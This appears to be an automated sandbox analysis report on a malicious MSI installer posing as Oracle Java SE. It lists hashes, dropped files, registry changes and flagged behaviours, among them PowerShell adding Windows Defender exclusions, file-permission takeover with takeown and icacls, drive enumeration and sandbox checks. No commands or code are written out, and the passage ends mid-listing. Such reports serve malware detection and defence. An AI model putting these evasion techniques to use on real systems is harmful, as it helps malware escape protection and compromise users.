Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 16:20
Static task
static1
Behavioral task
behavioral1
Sample
0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
Resource
win10v2004-20240802-en
General
-
Target
0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
-
Size
3.9MB
-
MD5
0b8b4d1854add7dfc1a27b1e93fb002b
-
SHA1
38cecb90eb2b89d81db27a988ff09ce20db26e8e
-
SHA256
dee25db703acc220d63785d7a72cce3817305642f5da1dc6f155d5d693bcde88
-
SHA512
746d3f81089bf4210a831b5f5a8bec6fa946fe2cb071eb03cce2702c1e79f198cf40a7eafc89067923282a11d583188c885de8fd7d656367ee0b2ba1b861dd34
-
SSDEEP
98304:nxnFFK+GEWJRgsnAWE05y4faRXsYA+tiQDnIjlBzpA7iQTWKKhgblL0n:JFFKZEWJtni7XpA+MSIjl5pQnTWth
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3132 powershell.exe 3380 powershell.exe 4732 powershell.exe 1232 powershell.exe 4488 powershell.exe 4812 powershell.exe 4328 powershell.exe 2812 powershell.exe 4364 powershell.exe 3200 powershell.exe 3232 powershell.exe 4460 powershell.exe 3000 powershell.exe 4832 powershell.exe 1644 powershell.exe 892 powershell.exe 4396 powershell.exe 4356 powershell.exe 4008 powershell.exe 4472 powershell.exe 2840 powershell.exe 4756 powershell.exe -
Possible privilege escalation attempt 3 IoCs
Processes:
takeown.exeicacls.exeicacls.exepid Process 1992 takeown.exe 532 icacls.exe 2592 icacls.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
takeown.exeicacls.exeicacls.exepid Process 1992 takeown.exe 532 icacls.exe 2592 icacls.exe -
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exeflow pid Process 4 844 msiexec.exe 8 844 msiexec.exe 10 844 msiexec.exe 14 844 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in Program Files directory 27 IoCs
Processes:
msiexec.exedescription ioc Process File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat msiexec.exe File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll msiexec.exe -
Drops file in Windows directory 14 IoCs
Processes:
msiexec.exeMsiExec.exedescription ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e5777a3.msi msiexec.exe File opened for modification C:\Windows\Installer\{D475A886-3AC6-4816-B147-DC43D33F3540}\Logo.ico msiexec.exe File opened for modification C:\Windows\Installer\MSI7B4D.tmp msiexec.exe File created C:\Windows\Installer\e5777a1.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{D475A886-3AC6-4816-B147-DC43D33F3540} msiexec.exe File opened for modification C:\Windows\Installer\MSI7986.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7AFE.tmp msiexec.exe File created C:\Windows\Installer\wix{D475A886-3AC6-4816-B147-DC43D33F3540}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\MSI7976.tmp msiexec.exe File created C:\Windows\Installer\{D475A886-3AC6-4816-B147-DC43D33F3540}\Logo.ico msiexec.exe File opened for modification C:\Windows\Installer\e5777a1.msi msiexec.exe -
Loads dropped DLL 3 IoCs
Processes:
MsiExec.exeMsiExec.exepid Process 692 MsiExec.exe 2500 MsiExec.exe 2500 MsiExec.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exepowershell.execmd.exepowershell.execmd.exepowershell.exepowershell.exeMsiExec.exetaskkill.exepowershell.exepowershell.exeMsiExec.exepowershell.exepowershell.exepowershell.exeicacls.exepowershell.exeexplorer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetakeown.exeicacls.exepowershell.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz explorer.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2140 taskkill.exe -
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 43 IoCs
Processes:
msiexec.exeexplorer.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\688A574D6CA361841B74CD343DF35304 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\ProductName = "Java SE" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3434171B899944440BE5255593F74797 msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Clients = 3a0000000000 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\PackageCode = "9D60AB34E1F9AF540951EAB0CA4EB4A5" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\ProductIcon = "C:\\Windows\\Installer\\{D475A886-3AC6-4816-B147-DC43D33F3540}\\Logo.ico" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\688A574D6CA361841B74CD343DF35304\ProductFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3434171B899944440BE5255593F74797\688A574D6CA361841B74CD343DF35304 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Version = "134217999" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\PackageName = "0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid Process 6032 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
